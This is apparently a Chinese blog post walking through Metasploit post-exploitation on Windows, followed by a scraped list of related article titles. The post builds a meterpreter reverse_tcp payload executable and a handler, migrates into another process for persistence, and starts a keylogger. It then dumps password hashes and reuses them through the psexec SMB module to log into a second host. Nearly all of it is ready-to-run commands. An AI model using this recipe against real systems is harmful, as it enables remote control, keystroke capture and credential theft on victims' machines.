00×01

首先,我们先来生成一个 meterpreter 类型的 PALOAD :

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1211 X >x.exe

00×02

建立反弹处理 exploit :

use exploit/mutil/handler

set payload windows/meterpreter/reverse_tcp

set LHOST=192.168.2.133

set LPORT=1211

exploit

00×03

当目标系统成功运行我们配置好的 PAYLOAD ,我们就会在Kali的console界面,反弹取得 shell 。此时,我们要做的第一件事,就是将我们 PAYLOAD 的当前进程,转移注入到另外个可以维持我们持续权限的进程上!

migrate 616

00×04

接下来,我们就可以在取得shell的console界面进行对目标系统的任意操作了!例如:我们可以打开一个键盘记录器:

keyscan_start 开启键盘记录

keyscan_dump 查看记录内容

keyscan_stop 停止键盘记录

00×05

同样,我们还可以 hashdump 目标系统上的所有账户密码 hash :

hashdump

00×06

当我们取得 hash 值后,我们可以利用 MSF 提供的 smb exploit 模块进行 hash 直接登录!

use exploit/windows/smb/psexec

use windows/meterpreter/reverse_tcp

set LHOST 192.168.2.133

set RHOST 192.168.2.131

set LPORT 1212

set SMBPass xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

set SMBUser administrator

00×07

最后,我们运行 exploit 即可!

MSF之meterpreter权限维持相关推荐

  1. 【Web安全】内网渗透研究之利用MSF和Impacket工具拿域控

    内网渗透拿域控 环境:http://afsgr16-b1ferw.aqlab.cn/?id=1 [查看资料] 1.进去一看,典型的sql注入 2.测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路 ...

  2. MSF(六):后渗透

    后渗透测试 安全牛学习Metasploit Framework笔记 一.已经获得目标系统控制权后扩大战果 (1)提权 (2)信息收集 (3)渗透内网 (4)永久后门 二.基于已有session扩大战果 ...

  3. 内网渗透-window权限维持

    window权限维持 文章目录 window权限维持 前言 meterpreter权限维持 persistence metsvc 系统工具替换后门 iexplore.exe narrator osk ...

  4. 内网渗透-msf及socks代理转发

    0x00 学习环境 拓扑如上,现在已经拥有了WIN2008的meterpreter权限 希望通过此主机进行代理转发,从而使msf能够攻击WIN7从而拿到权限. 0x01 路由转发1 先在meterpr ...

  5. 提权-win烂土豆dll劫持引号路径服务权限

    以下几种提权方法的适合环境(web用户/本机用户)因方法而不同,有的方法在两种权限下都适用,一般也都是本机权限大于webshell权限. win 烂土豆提权(MS16-075): 烂土豆(Rotten ...

  6. 内网渗透之MSF框架模块详细作用介绍

    目录 Metasploit Framework MSF主机存活探测类 MSF主机端口扫描类 MSF主机服务探测类 MSF主机反弹shell类 MSF主机服务爆破类 MSF攻击模块利用类 MSF数据库提 ...

  7. 三层网络靶场搭建MSF内网渗透

    三层网络靶场搭建&MSF内网渗透 在最近的CTF比赛中,综合靶场出现的次数越来越多,这种形式的靶场和真实的内网渗透很像,很贴合实际工作,但我们往往缺少多层网络的练习环境.本文通过VMware搭 ...

  8. Meterpreter 提权

    0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpret ...

  9. ms08_067漏洞渗透步骤——MSF

    本文简单介绍了如何使用metasploit针对ms08_067进行渗透测试,仅供学习 测试环境 描述 ip 主机 kali2020 192.168.1.113 目标主机 win xp sp3 192. ...

  10. Cobalt Strike 注入msf会话

    目录 (一)环境准备 1.启动服务端 2.启动客户端 3.一个在msf拿到权限的靶机 (二) 配置msf创建监听 1.使用msf创建后门 2.使用python创建一个web服务,然后使用靶机下载 3. ...

最新文章

  1. 常见几种浏览器兼容性问题与解决方案
  2. iphone刷基带_iphone7基带坏了怎么办,iphone7基带修复多少钱
  3. JavaScript中判断是否存在某属性
  4. 06 矩阵计算【动手学深度学习v2】
  5. java 接口的观察者模式_java观察者模式
  6. docker mysql主从_使用docker 实现MySQL主从同步/读写分离
  7. 如何用计算机绘图画图,2018年《计算机绘图》考试试题及答案【完整版】.doc
  8. nonlocal和global关键字
  9. C++ 通讯录设计(七)
  10. 集线器级联增加了网络数量,效率降低了,形成了大的冲突域,怎么解决?
  11. 阿里第二代微服务强势崛起,你还敢往简历上写“精通”吗?
  12. ListView实现多种item布局的方法和注意事项
  13. JSLint说“缺少基数参数”
  14. 上海是怎么错失这些年的互联网机遇的?
  15. 创建图片外链——“极简图床”
  16. 个人开发作品分享:iTab新标签页
  17. C#使用System.Speech制作语音提示功能
  18. 【转】外连接&全连接的区别
  19. C语言gdb调试之精髓 | gdb调试多线程
  20. zabbix4.4.3使用postgresql数据库

热门文章

  1. 【知识图谱】实践篇——基于知识图谱的《红楼梦》人物关系可视化及问答系统实践:part5人物关系全貌与问答初入
  2. 举个栗子!Tableau 技巧(126):学几个常用的日期函数
  3. Variable Declarations
  4. 6.22 android计算字符高度宽度,红蓝3D图片的制作原理及NDK生成实现
  5. win10系统点击控制台自定义快捷键失效问题解决
  6. 奖金高达200万!武汉市便利店行业发展专项资金支持条件、材料及流程
  7. 翟菜花:从美团配送新品牌发布,看即时配送行业奇点何时到来
  8. win7 cmd 无法复制粘贴
  9. 日本艺伎的拍照姿势,竟源于孔子?看完真的涨知识···
  10. mysql视图出问题如何解决_MySQL视图